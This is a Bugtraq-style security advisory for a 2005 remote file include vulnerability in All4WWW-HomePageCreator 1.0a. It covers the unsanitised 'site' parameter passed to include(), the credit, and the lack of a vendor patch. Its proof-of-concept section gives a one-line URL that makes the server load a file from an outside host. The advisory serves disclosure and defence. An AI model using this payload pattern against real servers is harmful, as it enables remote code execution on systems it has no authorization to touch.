BID:13169

All4WWW-HomePageCreator Index.PHP Arbitrary Remote File Include Vulnerability

Info

All4WWW-HomePageCreator Index.PHP Arbitrary Remote File Include Vulnerability

Bugtraq ID:	13169
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Apr 14 2005 12:00AM
Updated:	Apr 14 2005 12:00AM
Credit:	Francisco Alisson <[email protected]> is credited with the discovery of this vulnerability.
Vulnerable:	All4WWW All4WWW-Homepagecreator 1.0 a

Not Vulnerable:

Discussion

All4WWW-HomePageCreator Index.PHP Arbitrary Remote File Include Vulnerability

All4WWW-Homepagecreator is affected by an arbitrary remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an 'include()' function call.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process.

Exploit / POC

All4WWW-HomePageCreator Index.PHP Arbitrary Remote File Include Vulnerability

No exploit is required.

The following proof of concept is available:
http://www.example.com/index.php?site=http://www.example.com/some-file

Solution / Fix

All4WWW-HomePageCreator Index.PHP Arbitrary Remote File Include Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

References

All4WWW-HomePageCreator Index.PHP Arbitrary Remote File Include Vulnerability

References:

All4WWW-Homepagecreator Remote Command Execution (Francisco Alisson )